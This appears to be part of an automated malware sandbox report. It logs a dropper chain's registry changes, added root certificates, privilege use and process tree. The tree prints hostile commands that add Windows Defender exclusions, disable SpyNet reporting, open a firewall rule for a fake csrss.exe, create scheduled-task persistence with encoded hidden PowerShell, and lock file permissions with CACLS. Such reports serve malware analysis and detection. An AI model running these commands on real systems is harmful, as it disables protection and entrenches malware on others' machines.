Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-872 = "Pakistan Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-752 = "Tonga Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-1021 = "Bangladesh Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-51 = "Greenland Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-251 = "Dateline Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A

Modifies system certificate store

evasion spyware trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474 C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4 C:\Windows\rss\csrss.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4 C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A

Runs net.exe

Suspicious behavior: CmdExeWriteProcessMemorySpam

Description Indicator Process Target
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\3zj66Wk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\3zj66Wk.exe N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Windows\Explorer.EXE N/A

Suspicious behavior: LoadsDriver

Description Indicator Process Target
N/A N/A N/A N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\3zj66Wk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\toolspub2.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\D5D.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\K.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\C135.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Token: SeImpersonatePrivilege N/A C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\rss\csrss.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeDebugPrivilege N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files\Google\Chrome\updater.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3040 wrote to memory of 2220 N/A C:\Users\Admin\AppData\Local\Temp\e82947097dd2700b1d14eb33d3de85751a7786332b5c657824792cc1941e1eae.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\sq1VZ08.exe
PID 3040 wrote to memory of 2220 N/A C:\Users\Admin\AppData\Local\Temp\e82947097dd2700b1d14eb33d3de85751a7786332b5c657824792cc1941e1eae.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\sq1VZ08.exe
PID 3040 wrote to memory of 2220 N/A C:\Users\Admin\AppData\Local\Temp\e82947097dd2700b1d14eb33d3de85751a7786332b5c657824792cc1941e1eae.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\sq1VZ08.exe
PID 3040 wrote to memory of 2220 N/A C:\Users\Admin\AppData\Local\Temp\e82947097dd2700b1d14eb33d3de85751a7786332b5c657824792cc1941e1eae.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\sq1VZ08.exe
PID 3040 wrote to memory of 2220 N/A C:\Users\Admin\AppData\Local\Temp\e82947097dd2700b1d14eb33d3de85751a7786332b5c657824792cc1941e1eae.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\sq1VZ08.exe
PID 3040 wrote to memory of 2220 N/A C:\Users\Admin\AppData\Local\Temp\e82947097dd2700b1d14eb33d3de85751a7786332b5c657824792cc1941e1eae.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\sq1VZ08.exe
PID 3040 wrote to memory of 2220 N/A C:\Users\Admin\AppData\Local\Temp\e82947097dd2700b1d14eb33d3de85751a7786332b5c657824792cc1941e1eae.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\sq1VZ08.exe
PID 2220 wrote to memory of 1876 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\sq1VZ08.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\mv6FC02.exe
PID 2220 wrote to memory of 1876 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\sq1VZ08.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\mv6FC02.exe
PID 2220 wrote to memory of 1876 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\sq1VZ08.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\mv6FC02.exe
PID 2220 wrote to memory of 1876 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\sq1VZ08.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\mv6FC02.exe
PID 2220 wrote to memory of 1876 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\sq1VZ08.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\mv6FC02.exe
PID 2220 wrote to memory of 1876 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\sq1VZ08.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\mv6FC02.exe
PID 2220 wrote to memory of 1876 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\sq1VZ08.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\mv6FC02.exe
PID 1876 wrote to memory of 2324 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\mv6FC02.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\va5Ca30.exe
PID 2324 wrote to memory of 2772 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\va5Ca30.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\mP9Sj06.exe
PID 2772 wrote to memory of 2012 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\mP9Sj06.exe C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1bs92YJ6.exe
PID 2012 wrote to memory of 2616 N/A C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1bs92YJ6.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2772 wrote to memory of 2636 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\mP9Sj06.exe C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\2CQ7657.exe
PID 2324 wrote to memory of 2552 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\va5Ca30.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\3zj66Wk.exe
PID 1876 wrote to memory of 2872 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\mv6FC02.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\4ST961YO.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Windows\Explorer.EXE

C:\Windows\Explorer.EXE

C:\Users\Admin\AppData\Local\Temp\e82947097dd2700b1d14eb33d3de85751a7786332b5c657824792cc1941e1eae.exe

"C:\Users\Admin\AppData\Local\Temp\e82947097dd2700b1d14eb33d3de85751a7786332b5c657824792cc1941e1eae.exe"

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\sq1VZ08.exe

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\sq1VZ08.exe

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\mv6FC02.exe

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\mv6FC02.exe

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\va5Ca30.exe

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\va5Ca30.exe

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\mP9Sj06.exe

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\mP9Sj06.exe

C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1bs92YJ6.exe

C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1bs92YJ6.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\2CQ7657.exe

C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\2CQ7657.exe

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\3zj66Wk.exe

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\3zj66Wk.exe

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\4ST961YO.exe

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\4ST961YO.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\5tZ8WP7.exe

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\5tZ8WP7.exe

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe

"C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe"

C:\Windows\SysWOW64\schtasks.exe

"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN explothe.exe /TR "C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe" /F

C:\Windows\system32\cmd.exe

"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\C17B.tmp\C17C.tmp\C17D.bat C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\6If0Yv8.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /k echo Y|CACLS "explothe.exe" /P "Admin:N"&&CACLS "explothe.exe" /P "Admin:R" /E&&echo Y|CACLS "..\fefffe8cea" /P "Admin:N"&&CACLS "..\fefffe8cea" /P "Admin:R" /E&&Exit

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\6If0Yv8.exe

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\6If0Yv8.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo Y"

C:\Windows\SysWOW64\cacls.exe

CACLS "explothe.exe" /P "Admin:N"

C:\Windows\SysWOW64\cacls.exe

CACLS "explothe.exe" /P "Admin:R" /E

C:\Windows\SysWOW64\cacls.exe

CACLS "..\fefffe8cea" /P "Admin:N"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo Y"

C:\Program Files\Internet Explorer\iexplore.exe

"C:\Program Files\Internet Explorer\iexplore.exe" https://www.facebook.com/login

C:\Windows\SysWOW64\cacls.exe

CACLS "..\fefffe8cea" /P "Admin:R" /E

C:\Program Files\Internet Explorer\iexplore.exe

"C:\Program Files\Internet Explorer\iexplore.exe" https://www.youtube.com/

C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE

"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2280 CREDAT:275457 /prefetch:2

C:\Program Files\Internet Explorer\iexplore.exe

"C:\Program Files\Internet Explorer\iexplore.exe" https://accounts.google.com/

C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE

"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2280 CREDAT:472074 /prefetch:2

C:\Users\Admin\AppData\Local\Temp\D2D9.exe

C:\Users\Admin\AppData\Local\Temp\D2D9.exe

C:\Users\Admin\AppData\Local\Temp\FB51.exe

C:\Users\Admin\AppData\Local\Temp\FB51.exe

C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE

"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2280 CREDAT:14693378 /prefetch:2

C:\Windows\system32\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\FE3E.bat" "

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Rl0Uz9HJ.exe

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Rl0Uz9HJ.exe

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\vk8qw0bZ.exe

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\vk8qw0bZ.exe

C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\TM0pC3TM.exe

C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\TM0pC3TM.exe

C:\Users\Admin\AppData\Local\Temp\18A.exe

C:\Users\Admin\AppData\Local\Temp\18A.exe

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\YD6bx5XP.exe

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\YD6bx5XP.exe

C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\1Dk37rF7.exe

C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\1Dk37rF7.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\2Jf821dM.exe

C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\2Jf821dM.exe

C:\Users\Admin\AppData\Local\Temp\D5D.exe

C:\Users\Admin\AppData\Local\Temp\D5D.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1700 -s 268

C:\Users\Admin\AppData\Local\Temp\1441.exe

C:\Users\Admin\AppData\Local\Temp\1441.exe

C:\Windows\SysWOW64\rundll32.exe

"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\006700e5a2ab05\clip64.dll, Main

C:\Windows\system32\taskeng.exe

taskeng.exe {A2D546EA-EA5E-4582-871C-C0A44288BF9D} S-1-5-21-3618187007-3650799920-3290345941-1000:BPDFUYWR\Admin:Interactive:[1]

C:\Users\Admin\AppData\Local\Temp\9D8D.exe

C:\Users\Admin\AppData\Local\Temp\9D8D.exe

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe

C:\Users\Admin\AppData\Local\Temp\toolspub2.exe

"C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"

C:\Users\Admin\AppData\Local\Temp\B2E2.exe

C:\Users\Admin\AppData\Local\Temp\B2E2.exe

C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe

"C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe"

C:\Users\Admin\AppData\Local\Temp\setup.exe

"C:\Users\Admin\AppData\Local\Temp\setup.exe"

C:\Users\Admin\AppData\Local\Temp\toolspub2.exe

"C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"

C:\Users\Admin\AppData\Local\Temp\C135.exe

C:\Users\Admin\AppData\Local\Temp\C135.exe

C:\Users\Admin\AppData\Local\Temp\kos2.exe

"C:\Users\Admin\AppData\Local\Temp\kos2.exe"

C:\Users\Admin\AppData\Local\Temp\latestX.exe

"C:\Users\Admin\AppData\Local\Temp\latestX.exe"

C:\Users\Admin\AppData\Local\Temp\7zSD7D8.tmp\Install.exe

.\Install.exe

C:\Users\Admin\AppData\Local\Temp\set16.exe

"C:\Users\Admin\AppData\Local\Temp\set16.exe"

C:\Users\Admin\AppData\Local\Temp\K.exe

"C:\Users\Admin\AppData\Local\Temp\K.exe"

C:\Users\Admin\AppData\Local\Temp\is-GN92K.tmp\is-6U04H.tmp

"C:\Users\Admin\AppData\Local\Temp\is-GN92K.tmp\is-6U04H.tmp" /SL4 $502EC "C:\Users\Admin\AppData\Local\Temp\set16.exe" 1281875 52224

C:\Users\Admin\AppData\Local\Temp\7zSDBEE.tmp\Install.exe

.\Install.exe /MKdidA "385119" /S

C:\Windows\SysWOW64\net.exe

"C:\Windows\system32\net.exe" helpmsg 20

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 helpmsg 20

C:\Program Files (x86)\MyBurn\MyBurn.exe

"C:\Program Files (x86)\MyBurn\MyBurn.exe" -i

C:\Users\Admin\AppData\Local\Temp\F753.exe

C:\Users\Admin\AppData\Local\Temp\F753.exe

C:\Windows\SysWOW64\forfiles.exe

"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"

C:\Windows\SysWOW64\forfiles.exe

"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"

C:\Windows\SysWOW64\cmd.exe

/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&

\??\c:\windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32

C:\Windows\SysWOW64\cmd.exe

/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&

\??\c:\windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32

\??\c:\windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64

\??\c:\windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64

C:\Users\Admin\AppData\Local\Temp\317.exe

C:\Users\Admin\AppData\Local\Temp\317.exe

C:\Program Files (x86)\MyBurn\MyBurn.exe

"C:\Program Files (x86)\MyBurn\MyBurn.exe" -s

C:\Windows\SysWOW64\schtasks.exe

"C:\Windows\system32\schtasks.exe" /Query

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "goNnmaXQx" /SC once /ST 02:30:19 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="

C:\Windows\SysWOW64\schtasks.exe

schtasks /run /I /tn "goNnmaXQx"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==

C:\Windows\system32\makecab.exe

"C:\Windows\system32\makecab.exe" C:\Windows\Logs\CBS\CbsPersist_20231025045428.log C:\Windows\Logs\CBS\CbsPersist_20231025045428.cab

C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe

"C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"

C:\Windows\system32\cmd.exe

C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"

C:\Windows\system32\netsh.exe

netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes

C:\Windows\rss\csrss.exe

C:\Windows\rss\csrss.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "goNnmaXQx"

C:\Windows\system32\gpupdate.exe

"C:\Windows\system32\gpupdate.exe" /force

C:\Windows\System32\cmd.exe

